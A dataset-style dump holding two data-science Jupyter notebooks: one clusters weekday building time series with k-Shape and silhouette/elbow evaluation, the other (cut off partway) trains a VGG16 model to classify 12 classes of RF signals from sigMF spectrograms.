text
stringlengths
2.5k
6.39M
kind
stringclasses
3 values
# Experiment 1: k-Shape on Raw Time Series ## Select context csv to work with (see above) ``` import pandas as pd df_weekday = pd.read_csv('data/weekdayContext.csv') print(df_weekday) # in this notebook we use Week Day Context ``` ## Download k-Shape library First from: https://github.com/Mic92/kshape ``` from kshape.core import kshape, zscore ``` Also from: https://tslearn.readthedocs.io/en/latest/auto_examples/plot_kshape.html# ``` import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm import plotly.plotly as py from scipy.spatial.distance import cdist from collections import Counter from tslearn.preprocessing import TimeSeriesScalerMeanVariance from tslearn.utils import to_time_series_dataset from tslearn.clustering import KShape from sklearn.metrics import silhouette_samples, silhouette_score from sklearn.metrics.pairwise import pairwise_distances from yellowbrick.cluster import SilhouetteVisualizer from yellowbrick.cluster import KElbowVisualizer """ Function to calculate average and sample silhouette score of dataset X for each cluster in rangeK. Additionally, a plot of each cluster with their instances sorted by their silhouette score, in descending order, with a dashed red line of overall average. """ def plotSilhouettes(X, rangeK, seed, max_iter): for k in rangeK: fig = plt.figure(figsize=(18,8)) ax = fig.add_subplot(1, 1, 1) # The (k+1)*10 is for inserting blank space between silhouette # plots of individual clusters, to demarcate them clearly. ax.set_ylim([0, len(X) + (k + 1) * 10]) # Initialize the clusterer with n_clusters value and a random generator # seed for reproducibility. sz = X.shape[1] ks_clusterer = KShape(n_clusters=k, verbose=True, random_state=seed, max_iter=max_iter) cluster_labels = ks_clusterer.fit_predict(X) # The silhouette_score gives the average value for all the samples. # This gives a perspective into the density and separation of the formed # clusters silhouette_avg = silhouette_score(X, cluster_labels) print("For k = {}. The average silhouette_score is : {}.".format(k, silhouette_avg)) # Compute the silhouette scores for each sample sample_silhouette_values = silhouette_samples(X, cluster_labels) y_lower = 10 for i in range(k): # Aggregate the silhouette scores for samples belonging to # cluster i, and sort them ith_cluster_silhouette_values = sample_silhouette_values[cluster_labels == i] ith_cluster_silhouette_values.sort() size_cluster_i = ith_cluster_silhouette_values.shape[0] y_upper = y_lower + size_cluster_i color = cm.nipy_spectral(float(i) / k) ax.fill_betweenx(np.arange(y_lower, y_upper), 0, ith_cluster_silhouette_values, facecolor=color, edgecolor=color, alpha=0.7) # Label the silhouette plots with their cluster numbers at the middle ax.text(-0.05, y_lower + 0.5 * size_cluster_i, str(i), fontsize = 20) # Compute the new y_lower for next plot y_lower = y_upper + 10 # 10 for the 0 samples ax.set_xlabel("Silhouette Coefficient Values", fontsize = 20) ax.set_ylabel("Cluster Label", fontsize = 20) # The vertical line for average silhouette score of all the values ax.axvline(x=silhouette_avg, color="red", linestyle="--") ax.set_yticks([]) # Clear the yaxis labels/ticks plt.suptitle(("Silhouette Analysis for KMeans clustering " "with num. clusters = %d" % k), fontsize=19, fontweight='bold') # plot all genereated figures plt.show() ``` ## Run k-Shape algorithm Observations from the github repo: - If the data is available from different sources with same frequency but at different points in time, it needs to be aligned. - kshape also expect no time series with a constant observation value or 'N/A' Distance measure: normalized cross-correlation measure (consider the shape while comparing them) ``` # get rid of building ID df_weekday_noID = df_weekday.copy() del df_weekday_noID['Unnamed: 0'] weekday_X_train = TimeSeriesScalerMeanVariance().fit_transform(np.squeeze(df_weekday_noID.values)) # dataFrame.values will generate a 3d arra (the third dimension being 1) so we convert it to a 2d array weekday_X_train = np.squeeze(weekday_X_train) # now is a 2d array print("Shape of X matrix: {}".format(weekday_X_train.shape)) sz = weekday_X_train.shape[1] seed = 3 max_iter = 500 k = 5 ks = KShape(n_clusters=k, verbose=True, random_state=seed, max_iter=max_iter) y_pred = ks.fit_predict(weekday_X_train) plt.figure(figsize=(18,10)) for yi in range(k): plt.subplot(k, 1, 1 + yi) for xx in weekday_X_train[y_pred == yi]: plt.plot(xx.ravel(), "k-", alpha=.2) plt.plot(ks.cluster_centers_[yi].ravel(), "r-") plt.xlim(0, sz) plt.ylim(-4, 4) plt.title("Cluster %d" % (yi + 1)) # plt.tight_layout() plt.show() ``` ## Evaluation: ### Evaluate resulting clusters with sillouhette coefficient plot ``` rangeK = [2, 3, 4, 5, 6] # values of K-clusters to test seed = 3 # random seed for reproducibility max_iter = 500 plotSilhouettes(weekday_X_train, rangeK, seed, max_iter) # using library for silhouettes (http://www.scikit-yb.org/en/latest/api/cluster/silhouette.html) # Instantiate the clustering model and visualizer model = KShape(n_clusters=5, verbose=True, random_state=seed) visualizer = SilhouetteVisualizer(model) visualizer.fit(weekday_X_train) # Fit the training data to the visualizer visualizer.poof() # Draw/show/poof the data ``` ### Evaluate resulting clusters with elbow method #### distortion metric: mean sum of squared distances to centers ``` # using library (http://www.scikit-yb.org/en/latest/api/cluster/elbow.html) # Instantiate the clustering model and visualizer model = KShape(random_state=seed,max_iter=max_iter) visualizer = KElbowVisualizer(model, k=(2,10), metric='distortion') visualizer.fit(weekday_X_train) # Fit the data to the visualizer visualizer.poof() # Draw/show/poof the data ``` #### silhouette: mean ratio of intra-cluster and nearest-cluster distance ``` # using library (http://www.scikit-yb.org/en/latest/api/cluster/elbow.html) # Instantiate the clustering model and visualizer model = KShape(random_state=seed,max_iter=max_iter) visualizer = KElbowVisualizer(model, k=(2,10), metric='silhouette') visualizer.fit(weekday_X_train) # Fit the data to the visualizer visualizer.poof() # Draw/show/poof the data ``` #### calinski_harabaz: ratio of within to between cluster dispersion ``` # using library (http://www.scikit-yb.org/en/latest/api/cluster/elbow.html) # Instantiate the clustering model and visualizer model = KShape(random_state=seed,max_iter=max_iter) visualizer = KElbowVisualizer(model, k=(2,10), metric='calinski_harabaz') visualizer.fit(weekday_X_train) # Fit the data to the visualizer visualizer.poof() # Draw/show/poof the data ```
github_jupyter
## sigMF RF classification; 12 classes ``` import os import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as F import torch.utils.data import torch.utils.data as data from torch.autograd import Variable import numpy as np import matplotlib.pyplot as plt from scipy import signal import glob import json from os import walk import pickle import json import pathlib import random from timeit import default_timer as timer import time from tqdm import tqdm from torch.utils.data import Dataset, DataLoader global GPU, fft, Fs, center_freq, fft_val, Fs_test, loss, batches, eps, var_noise, mean_noise, top global c1_coeff, c2_coeff, a, r1_c1, r2_c1, r1_c2, r2_c2, compare a = 1 r1_c2 = 1 r2_c2 = 10e1 top = .99 var_noise = 8.78e-09 mean_noise = 1 # not used eps = 1e-15 Fs = 1000000 fft = 1024 center_freq_file = 433.65e6 # when SDR doing 25MSPS with center at 428MHz center_freq_live = 428.00e6 # when SDR doing 25MSPS with center at 428MHz batches = 64 plt.style.use('default') GPU = 0 device = torch.device('cuda:0') print('Torch version =', torch.__version__, 'CUDA version =', torch.version.cuda) print('CUDA Device:', device) print('Is cuda available? =',torch.cuda.is_available()) r2_c2 !. /home/david/prefix-3.8/setup_env.sh ``` #### Machine paths ``` path_ram = "/home/david/sigMF_ML/RF/ramdisk/" path_usrp = "/home/david/prefix-3.8/" path = "/home/david/sigMF_ML/RF/RF_class/data/" # ACE path_val1 = "/home/david/sigMF_ML/RF/RF_class/data_val1/" # fft_center - class 9 path_val2 = "/home/david/sigMF_ML/RF/RF_class/data_val2/" # light switch - class 10 path_val3 = "/home/david/sigMF_ML/RF/RF_class/data_val3/" # clickndig - class 5 path_val4 = "/home/david/sigMF_ML/RF/RF_class/data_val4/" # GD55 - class 1 path_val5 = "/home/david/sigMF_ML/RF/RF_class/data_val5/" # lora125 - class 0 path_val6 = "/home/david/sigMF_ML/RF/RF_class/data_val6/" # lora250 - class 7 path_val7 = "/home/david/sigMF_ML/RF/RF_class/data_val7/" # NFM - class 2 path_val8 = "/home/david/sigMF_ML/RF/RF_class/data_val8/" # sado - class 6 path_val9 = "/home/david/sigMF_ML/RF/RF_class/data_val9/" # TYT - class 3 path_val10 = "/home/david/sigMF_ML/RF/RF_class/data_val10/" # vodeson - class 4 path_val11 = "/home/david/sigMF_ML/RF/RF_class/data_val11/" # white noise - class 8 path_val12 = "/home/david/sigMF_ML/RF/RF_class/data_val12/" # ysf - class 11 path_fig = "/home/david/sigMF_ML/RF/RF_class/" # ACE path_val = "/home/david/sigMF_ML/RF/RF_class/testing_data/" # ACE path_save = "/home/david/sigMF_ML/RF/RF_class/saved/" # ACE path_test = "/home/david/sigMF_ML/RF/RF_class/testing_data/" # ACE path_test_1msps = "/home/david/sigMF_ML/RF/RF_class/testing_data_1msps/" # ACE path_test_5msps = "/home/david/sigMF_ML/RF/RF_class/testing_data_5msps/" # ACE path_test_10msps = "/home/david/sigMF_ML/RF/RF_class/testing_data_10msps/" # ACE path_test_25msps = "/home/david/sigMF_ML/RF/RF_class/testing_data_25msps/" # ACE print(path) ``` ## Functions ``` # START OF FUNCTIONS **************************************************** def meta_encoder(meta_list, num_classes): a = np.asarray(meta_list, dtype=int) # print('a = ', a) return a def save_model(epoch,loss): rf_model = 'VGG16_20210309_2D_1e5' PATH = path_save+rf_model torch.save({ 'epoch': epoch, 'model_state_dict': model.state_dict(), 'optimizer_state_dict': optimizer.state_dict(), 'loss': loss,}, PATH) def load_model(): rf_model = 'VGG16_v58_20210211_2D_10dB_noise_autosave' PATH = path_save+rf_model device = torch.device("cuda:1") model = resnet50(2, 12) model.load_state_dict(torch.load(PATH)) model.to(device) model.eval() def gpu_test_file(db): if (msps == 1): w1 = fft elif (msps == 5): w1 = fft*1 elif (msps == 10): w1 = fft*1 elif (msps == 25): w1 = fft*1 print('gpu_test file function') I = db[0::2] Q = db[1::2] w = fft*msps print('Sample Rate = ',w,'MSPS') den = 2 print('window length = ', w1) win = torch.hann_window(w1, periodic=True, dtype=None, layout=torch.strided, requires_grad=False).cuda(GPU) I_stft = torch.stft(torch.tensor(I).cuda(GPU), n_fft=fft, hop_length=fft//den, win_length=w1, window=win, center=True, normalized=True, onesided=True) Q_stft = torch.stft(torch.tensor(Q).cuda(GPU), n_fft=fft, hop_length=fft//den, win_length=w1, window=win, center=True, normalized=True, onesided=True) I_mag = torch.abs(torch.sqrt(I_stft[:,:,0]**2+I_stft[:,:,1]**2)) Q_mag = torch.abs(torch.sqrt(Q_stft[:,:,0]**2+Q_stft[:,:,1]**2)) I_mag = torch.unsqueeze(I_mag, dim=2) Q_mag = torch.unsqueeze(Q_mag, dim=2) # print('I shape =', I_stft.shape, 'Q shape = ', Q_stft.shape ) # print('I_mag shape =', I_mag.shape, 'Q_mag shape = ', Q_mag.shape ) Z_stft = torch.cat((I_mag,Q_mag),2) # Z_stft = torch.cat((Z_stft[fft//2:,:,:],Z_stft[:fft//2,:,:])) # NOT SURE I NEED TO DO THIS... # print('gpu_test file Z shape =', Z_stft.shape) Z_stft = Z_stft[fft//2:,:,:] # throw bottom 1/2 away print('FINAL gpu_test FILE IQ shape =', Z_stft.shape) torch.cuda.empty_cache() return Z_stft # Returning 2D def gpu_test_live(db,msps): if (msps == 1): w1 = fft elif (msps == 5): w1 = fft*1 elif (msps == 10): w1 = fft*1 elif (msps == 25): w1 = fft*1 print('gpu_test live function') # I = db[0:10000000:2] # Q = db[1:10000000:2] I = db[0::2] Q = db[1::2] print('I length = ', len(I)) print('Q length = ', len(Q)) w = fft*msps print(w,'MSPS') den = 2 win = torch.hann_window(w1, periodic=True, dtype=None, layout=torch.strided, requires_grad=False).cuda(GPU) I_stft = torch.stft(torch.tensor(I).cuda(GPU), n_fft=w, hop_length=w//den, win_length=w1, window=win, center=True, normalized=True, onesided=True) Q_stft = torch.stft(torch.tensor(Q).cuda(GPU), n_fft=w, hop_length=w//den, win_length=w1, window=win, center=True, normalized=True, onesided=True) I_mag = torch.abs(torch.sqrt(I_stft[:,:,0]**2+I_stft[:,:,1]**2)) Q_mag = torch.abs(torch.sqrt(Q_stft[:,:,0]**2+Q_stft[:,:,1]**2)) I_mag = torch.unsqueeze(I_mag, dim=2) Q_mag = torch.unsqueeze(Q_mag, dim=2) Z_stft = torch.cat((I_mag,Q_mag),2) print('gpu_test live IQ shape =', Z_stft.shape) # Z_stft = torch.cat((Z_stft[w//2:,:,:],Z_stft[:w//2,:,:])) # NOT SURE I NEED TO DO THIS... Z_stft = Z_stft[:w//2,:,:]# throw bottom 1/2 away print('FINAL gpu_test LIVE IQ shape =', Z_stft.shape) return Z_stft # Returning 2D and plot def iq_read(data_files): # USING GPU to perform STFT print('iq_read function**********') data_IQ_list = [] data_IQ_temp = [] for file in data_files: db = np.fromfile(file, dtype="float32") # stft = gpu(db).detach().cpu().numpy() print('iq_read function') stft, stft_plot = gpu_test_file(db) stft = stft.detach().cpu().numpy() stft_plot = stft_plot.detach().cpu().numpy() stft_plot = 10*np.log10(np.abs(stft_plot+eps)) plt.imshow(stft_plot) plt.pcolormesh(stft_plot) # plt.imshow(stft, aspect='auto', origin='lower') plt.show() data_IQ_temp.append(stft) data_IQ_list = np.array(data_IQ_temp) return data_IQ_list def iq_read_test_file(data_files): # USING GPU to perform STFT data_IQ_list = [] data_IQ_temp = [] print('iq_read_test file') for file in data_files: db = np.fromfile(file, dtype="float32") stft = gpu_test_file(db) stft_plot = 20*np.log10(np.abs(stft[:,:,0].detach().cpu().numpy()+eps)) print('imshow method') plt.imshow(stft_plot, vmin=-70, vmax=5, aspect='auto', origin='lower') plt.show() data_IQ_temp.append(stft.detach().cpu().numpy()) data_IQ_list = np.array(data_IQ_temp) return data_IQ_list def iq_read_test_live(data_files,msps): # USING GPU to perform STFT # iq_cpu_plot(data_files) #checking with cpu complex plotting data_IQ_list = [] data_IQ_temp = [] print('iq_read_test live') for file in data_files: db = np.fromfile(file, dtype="float32") stft = gpu_test_live(db,msps) # ************************************************************************* # stft_plot = 20*np.log10(np.abs(stft[:,:,0].detach().cpu().numpy()+eps)) # print('iq_read_test live imshow method') # plt.imshow(stft_plot, vmin=-70, vmax=5, aspect='auto', origin='lower') # plt.show() # ************************************************************************* data_IQ_temp.append(stft.detach().cpu().numpy()) data_IQ_list = np.array(data_IQ_temp) return data_IQ_list def read_meta(meta_files): meta_list = [] for meta in meta_files: all_meta_data = json.load(open(meta)) meta_list.append(all_meta_data['global']["core:class"]) meta_list = list(map(int, meta_list)) return meta_list def read_num_val(x): x = len(meta_list_val) return x #**************************** Print historgram subplots ****************************** def histo_plots(inputs): fig=plt.figure(figsize=(8,8)) ncols = 2 nrows = 2 print('make torch inputs') print('inputs shape for histogram1 = ', inputs.shape) inputs = 10*np.log10(np.abs(inputs.cpu()+eps)) for x in range(4): # print('x = ', x, 'inputs shape for histogram2 = ', inputs[:,:,x].shape) flat_inputs = torch.flatten(inputs[:,:,x], start_dim=0, end_dim=-1).numpy() # print('type = ', type(flat_inputs)) # print('x = ', x, 'flat_input max = ', np.amax(flat_inputs)) # print('inputs are: ', flat_inputs.shape) fig.add_subplot(nrows, ncols, x+1) plt.hist(flat_inputs, bins=5000) plt.gca().set(title='Frequency Histogram', ylabel='Frequency'); plt.xlim(-100, 10) # plt.ylim(0, 40000) return flat_inputs #************************************************************************************* #**************************** Print historgram subplots ****************************** def histo_stats(inputs): # print('make torch inputs') # print('inputs shape for histogram1 = ', inputs.shape) mean = np.zeros(4) std = np.zeros(4) for x in range(4): # print('x = ', x, 'inputs shape for histogram2 = ', inputs[:,:,x].shape) flat_inputs = torch.flatten(inputs[:,:,x], start_dim=0, end_dim=-1).numpy() # print('inputs are: ', flat_inputs.shape) mean[x] = flat_inputs.mean() std[x] = flat_inputs.std() # print('mean = ', mean, 'std = ', std) return mean, std #**************************** Print historgram freq stats ****************************** def histo_stats_freq_file(inputs,msps): mean = inputs.mean() std = inputs.std() print("mean Freq = {0:9,.2f}".format(mean)) print("std Freq = {0:9,.2f}".format(std)) print('length of inputs = ', len(inputs)) # plt.hist(inputs, 30, facecolor='blue', align='mid') if (msps==25): plt.hist(inputs, 30, range=[428.0, 440.0], facecolor='blue', align='mid') elif (msps==1): plt.hist(inputs, 30, range=[433.65, 434.15], facecolor='blue', align='mid') elif (msps==5): plt.hist(inputs, 30, range=[433.00, 435.50], facecolor='blue', align='mid') elif (msps==10): plt.hist(inputs, 30, range=[433.00, 438.00], facecolor='blue', align='mid') else: print('WRONG SAMPLE RATE CHOSEN') plt.gca().set(title='Frequency Histogram', ylabel='Frequency'); plt.show() def histo_stats_freq_live(inputs,msps): mean = inputs.mean() std = inputs.std() print("mean Freq = {0:9,.2f}".format(mean)) print("std Freq = {0:9,.2f}".format(std)) print('length of inputs = ', len(inputs)) # plt.hist(inputs, 30, facecolor='blue', align='mid') if (msps==25): plt.hist(inputs, 30, range=[428.0, 440.0], facecolor='blue', align='mid') elif (msps==1): plt.hist(inputs, 30, range=[433.65, 434.15], facecolor='blue', align='mid') elif (msps==5): plt.hist(inputs, 30, range=[433.00, 435.50], facecolor='blue', align='mid') elif (msps==10): plt.hist(inputs, 30, range=[433.00, 438.00], facecolor='blue', align='mid') else: print('WRONG SAMPLE RATE CHOSEN') plt.gca().set(title='Frequency Histogram', ylabel='Frequency'); plt.show() # END OF FUNCTIONS ****************************************************** from functools import partial from dataclasses import dataclass from collections import OrderedDict VGG_types = { 'VGG11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'VGG13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'VGG16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'], 'VGG19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'], } class VGG_net(nn.Module): def __init__(self, in_channels=2, num_classes=12): super(VGG_net, self).__init__() self.in_channels = in_channels self.conv_layers = self.create_conv_layers(VGG_types['VGG16']) self.fcs = nn.Sequential( nn.Linear(512*7*7, 4096), nn.ReLU(), nn.Dropout(p=0.5), nn.Linear(4096, 4096), nn.ReLU(), nn.Dropout(p=0.5), nn.Linear(4096, num_classes) ) def forward(self, x): x = self.conv_layers(x) x = x.reshape(x.shape[0], -1) x = self.fcs(x) return x def create_conv_layers(self, architecture): layers = [] in_channels = self.in_channels for x in architecture: if type(x) == int: out_channels = x layers += [nn.Conv2d(in_channels=in_channels,out_channels=out_channels, kernel_size=(3,3), stride=(1,1), padding=(1,1)), nn.BatchNorm2d(x), nn.ReLU()] in_channels = x elif x == 'M': layers += [nn.MaxPool2d(kernel_size=(2,2), stride=(2,2))] return nn.Sequential(*layers) if __name__ == '__main__': device = 'cuda' if torch.cuda.is_available() else 'cpu' model = VGG_net(in_channels=2,num_classes=12).to(device) print(model) ## N = 3 (Mini batch size) #x = torch.randn(3, 3, 224, 224).to(device) #print(model(x).shape) from torchsummary import summary # model = VGG_net() # summary(model.cuda(), (2, 224, 224)) from torch.utils.data import Dataset class RFDataset(Dataset): def __init__(self, root_path): print(root_path) self.root_path = root_path self.list_of_all_pickles = sorted(pathlib.Path(root_path).rglob('*/chopped-data-224-224/*.pickle')) self.get_class = dict() class_folders = list(pathlib.Path(root_path).glob('*/')) for class_folder in class_folders: class_index = -1 metadata_path = list(class_folder.rglob('*.sigmf-meta'))[0] with open(metadata_path) as fp: metadata = json.load(fp) class_index = int(metadata["global"]["core:class"]) self.get_class[str(class_folder.stem)] = class_index def __len__(self): return len(self.list_of_all_pickles) def __getitem__(self, idx): filepath = self.list_of_all_pickles[idx] with open(filepath, 'rb') as fp: tensor = pickle.load(fp)['bounded'] foldername = filepath.parts[7] label = self.get_class[foldername] #return (tensor, label) # this is a tuple return {'data': tensor, 'label': label} ``` #### Evaluation dataset loader ``` rf_dataset1 = RFDataset(path_val1) val1_data = data.DataLoader(rf_dataset1, batch_size=batches, shuffle=True) rf_dataset2 = RFDataset(path_val2) val2_data = data.DataLoader(rf_dataset2, batch_size=batches, shuffle=True) rf_dataset3 = RFDataset(path_val3) val3_data = data.DataLoader(rf_dataset3, batch_size=batches, shuffle=True) rf_dataset4 = RFDataset(path_val4) val4_data = data.DataLoader(rf_dataset4, batch_size=batches, shuffle=True) rf_dataset5 = RFDataset(path_val5) val5_data = data.DataLoader(rf_dataset5, batch_size=batches, shuffle=True) rf_dataset6 = RFDataset(path_val6) val6_data = data.DataLoader(rf_dataset6, batch_size=batches, shuffle=True) rf_dataset7 = RFDataset(path_val7) val7_data = data.DataLoader(rf_dataset7, batch_size=batches, shuffle=True) rf_dataset8 = RFDataset(path_val8) val8_data = data.DataLoader(rf_dataset8, batch_size=batches, shuffle=True) rf_dataset9 = RFDataset(path_val9) val9_data = data.DataLoader(rf_dataset9, batch_size=batches, shuffle=True) rf_dataset10 = RFDataset(path_val10) val10_data = data.DataLoader(rf_dataset10, batch_size=batches, shuffle=True) rf_dataset11 = RFDataset(path_val11) val11_data = data.DataLoader(rf_dataset11, batch_size=batches, shuffle=True) rf_dataset12 = RFDataset(path_val12) val12_data = data.DataLoader(rf_dataset12, batch_size=batches, shuffle=True) ``` #### list of loaders ``` val_data_list = [val1_data] val_data_list.append(val2_data) val_data_list.append(val3_data) val_data_list.append(val4_data) val_data_list.append(val5_data) val_data_list.append(val6_data) val_data_list.append(val7_data) val_data_list.append(val8_data) val_data_list.append(val9_data) val_data_list.append(val10_data) val_data_list.append(val11_data) val_data_list.append(val12_data) print('done') ``` ## Training ``` def train_net(total): test_patch_total = 24000 # 120000 compare = .7 loss_plot = np.zeros(total) total_plot = np.zeros(total//5+1) batch_plot = np.zeros(len(training_data)*total//100) batch_indexer = 0 for epoch in tqdm(range(total), desc="Epoch"): model.train() start = timer() for i, rf_data in enumerate(training_data, 0): inputs = rf_data['data'] inputs = torch.squeeze(inputs, dim=1) # print('input1 = ', inputs.shape) inputs = inputs.permute(0,3,1,2).contiguous() # print('input before noise add = ', inputs.shape) batch_dim, b, c, d = inputs.shape # add som noise c2 = torch.FloatTensor(a).uniform_(r1_c2, r2_c2) inputs = inputs + torch.abs((((var_noise*c2)**0.5)*torch.randn(batch_dim, 4, 224, 224)*1)) #**************** take I and Q magnitudue only *********** I_temp = torch.abs(torch.sqrt(inputs[:,0,:,:]**2+inputs[:,1,:,:]**2)) I_temp = torch.unsqueeze(I_temp, dim=1) Q_temp = torch.abs(torch.sqrt(inputs[:,2,:,:]**2+inputs[:,3,:,:]**2)) Q_temp = torch.unsqueeze(Q_temp, dim=1) inputs = torch.cat((I_temp,Q_temp),1) # print('inputs after noise add = ', inputs.shape) #********************************************************* # batch_dim, b, c, d = inputs.shape # # add som noise # c2 = torch.FloatTensor(a).uniform_(r1_c2, r2_c2) # inputs = inputs + torch.abs((((var_noise*c2)**0.5)*torch.randn(batch_dim, 2, 224, 224)*1)) inputs = Variable(inputs.cuda(GPU)) labels = rf_data['label'] labels = labels.cuda(GPU) outputs = model(inputs) loss = criterion(outputs, labels) optimizer.zero_grad() loss.backward() optimizer.step() end = timer() batch_time = end - start #*************************************************************************************** print('batch time = ', batch_time) print('************************* start *************************') total_correct_patches = grand_total = 0 start_test = timer() model.eval() for testing in val_data_list: t = train_val(testing) total_correct_patches = total_correct_patches + t grand_total = total_correct_patches/test_patch_total batch_plot[batch_indexer] = grand_total*100 batch_indexer = batch_indexer + 1 # print('Batch number = ', i, 'of', len(training_data)) print('Total % correct {:.2f}%'.format(grand_total*100)) model.train end_test = timer() test_time = end_test - start_test print('test time = ', test_time) print('*************************** end ***************************') #**************************************************************************************** save_model(epoch,loss) tqdm.write('___________________________________________') tqdm.write("Epoch {} Loss {:.10f} ".format(epoch+1, loss.data*1)) tqdm.write('___________________________________________') return loss_plot, batch_plot ``` #### Training Evaluation ``` def train_val(val_data): with torch.no_grad(): total = noise = center_fft = target_to_int = accumulated_corrects = percent_correct = 0 c0 = c1 = c2 = c3 = c4 = c5 = c6 = c7 = c8 = c9 = 0 for i, rf_data in enumerate(val_data, 0): inputs = rf_data['data'] inputs = torch.squeeze(inputs, dim=1) inputs = inputs.permute(0,3,1,2).contiguous() batch_dim, b, c, d = inputs.shape # add som noise c2 = torch.FloatTensor(a).uniform_(r1_c2, r2_c2) inputs = inputs + torch.abs((((var_noise*c2)**0.5)*torch.randn(batch_dim, 4, 224, 224)*1)) #**************** take I and Q magnitudue only *********** I_temp = torch.abs(torch.sqrt(inputs[:,0,:,:]**2+inputs[:,1,:,:]**2)) I_temp = torch.unsqueeze(I_temp, dim=1) Q_temp = torch.abs(torch.sqrt(inputs[:,2,:,:]**2+inputs[:,3,:,:]**2)) Q_temp = torch.unsqueeze(Q_temp, dim=1) inputs = torch.cat((I_temp,Q_temp),1) #********************************************************* # batch_dim, b, c, d = inputs.shape # # add som noise # c2 = torch.FloatTensor(a).uniform_(r1_c2, r2_c2) # inputs = inputs + torch.abs((((var_noise*c2)**0.5)*torch.randn(batch_dim, 2, 224, 224)*1)) inputs = Variable(inputs.cuda(GPU)) labels = rf_data['label'] labels = labels.cuda(GPU) optimizer.zero_grad() outputs = model(inputs) _, predicted = torch.max(outputs.data, 1) for b in range(len(predicted)): labels_temp = labels[b].detach().cpu().numpy() temp = predicted[b].detach().cpu().numpy() if (labels_temp==temp): accumulated_corrects = accumulated_corrects+1 torch.cuda.empty_cache() return accumulated_corrects ``` ## Inference Segmented Dataloader ``` # Inference Dataloader with labels class inference_dataloader_segmented_live(data.Dataset): def __init__(self): self.dataPath = path self.num_classes = 12 self.num_examples = 1 # use only 1 for semi-live inferencing def __getitem__(self, index): sigmf_data = np.array(data_IQ_list_val[index]) print('sigmf_data = ', sigmf_data.shape) frequency, time, dims1 = sigmf_data.shape print('frequency = ', frequency, ' time = ', time) data_IQ = [] data_IQ_temp2 = [] seg_t = 224 seg_f = 224 seg_time = time//seg_t seg_freq = frequency//seg_f print('seg_time = ', seg_time, 'seg_freq = ', seg_freq) # Segment the time axis for j in range(seg_time): # Segment the frequency axis for k in range(seg_freq): IQ = sigmf_data[seg_f*k:(seg_f)+seg_f*k,seg_t*j:(seg_t)+seg_t*j] data_IQ_temp2.append(IQ) data_IQ = np.array(data_IQ_temp2) print('data_IQ shape = ', data_IQ.shape) loop_counter, dim1, dim2, dim3 = data_IQ.shape TRUTH = meta_encoder(meta_list_val, self.num_classes) TRUTH = TRUTH.astype(np.float32) return torch.from_numpy(data_IQ),torch.from_numpy(TRUTH), loop_counter, seg_freq def __len__(self): return self.num_examples # Inference Dataloader with labels class inference_dataloader_segmented(data.Dataset): def __init__(self): self.dataPath = path self.num_classes = 12 self.num_examples = 1 def __getitem__(self, index): sigmf_data = np.array(data_IQ_list_val[index]) print('sigmf_data = ', sigmf_data.shape) frequency, time, dims1 = sigmf_data.shape print('frequency = ', frequency, ' time = ', time) data_IQ = [] data_IQ_temp2 = [] seg_t = 224 seg_f = 224 seg_time = time//seg_t seg_freq = frequency//seg_f print('seg_time = ', seg_time, 'seg_freq = ', seg_freq) # Segment the time axis for j in range(seg_time): # Segment the frequency axis for k in range(seg_freq): IQ = sigmf_data[seg_f*k:(seg_f)+seg_f*k,seg_t*j:(seg_t)+seg_t*j] data_IQ_temp2.append(IQ) data_IQ = np.array(data_IQ_temp2) print('data_IQ shape = ', data_IQ.shape) loop_counter, dim1, dim2, dim3 = data_IQ.shape TRUTH = meta_encoder(meta_list_val, self.num_classes) TRUTH = TRUTH.astype(np.float32) return torch.from_numpy(data_IQ),torch.from_numpy(TRUTH), loop_counter, seg_freq def __len__(self): return self.num_examples ``` ### validation functions ``` def validation_read(): # Inference DATA READING ************************************************ # read in validation IQ and meta data os.chdir(path_val) data_files_validation = sorted(glob.glob('*.sigmf-data')) meta_files_validation = sorted(glob.glob('*.sigmf-meta')) for meta in meta_files_validation: all_meta_data = json.load(open(meta)) print("validation file name = ", meta) # Load validation sigmf-data files meta_list_val = read_meta(meta_files_validation) data_IQ_list_val = iq_read(data_files_validation) return data_IQ_list_val, meta_list_val def testing_read(): print('testing_read function') # Inference DATA READING ************************************************ # read in validation IQ and meta data os.chdir(path_val) data_files_validation = sorted(glob.glob('*.sigmf-data')) meta_files_validation = sorted(glob.glob('*.sigmf-meta')) for meta in meta_files_validation: all_meta_data = json.load(open(meta)) print("testing file name = ", meta) meta_list_val = read_meta(meta_files_validation) data_IQ_list_val = iq_read_test_file(data_files_validation) return data_IQ_list_val, meta_list_val ``` #### Changed to get test data from different directory ``` def inference_read(msps): # Inference DATA READING ************************************************ # read in validation IQ and meta data os.chdir(path_ram) data_files_validation = sorted(glob.glob('*.sigmf-data')) meta_files_validation = sorted(glob.glob('*.sigmf-meta')) for meta in meta_files_validation: all_meta_data = json.load(open(meta)) print("inference file name = ", meta) # Load validation sigmf-data files meta_list_val = read_meta(meta_files_validation) data_IQ_list_val = iq_read_test_live(data_files_validation,msps) return data_IQ_list_val, meta_list_val def inference_read_file(msps,path): # Inference DATA READING ************************************************ # read in validation IQ and meta data os.chdir(path) data_files_validation = sorted(glob.glob('*.sigmf-data')) meta_files_validation = sorted(glob.glob('*.sigmf-meta')) for meta in meta_files_validation: all_meta_data = json.load(open(meta)) print("inference file name = ", meta) # Load validation sigmf-data files meta_list_val = read_meta(meta_files_validation) data_IQ_list_val = iq_read_test_live(data_files_validation,msps) return data_IQ_list_val, meta_list_val # inference ************************************************************ def testing_file(msps): large_width = 400 np.set_printoptions(precision=2,floatmode='fixed', linewidth=large_width) model.eval() V = data.DataLoader(inference_dataloader_segmented(), batch_size=1) start_frequency = (center_freq_file) match_freq = start_frequency print('start_frequency = ', start_frequency/1000000) freq_offset = 0 total = noise = center_fft = target_to_int = accumulated_corrects = percent_correct = 0 c0 = c1 = c2 = c3 = c4 = c5 = c6 = c7 = c8 = c9 = 0 # total = 68 with torch.no_grad(): for i, rf_data in enumerate(V, 0): accumulated_corrects = 0 percent_correct = 0 target_to_int = 0 inputs, target, counter, seg_freq = rf_data print('testing counter = ', counter, 'seg_freq =', seg_freq) #**************************** Print segmented pics *********************************** # stft_plot = np.squeeze(inputs, axis=0) # 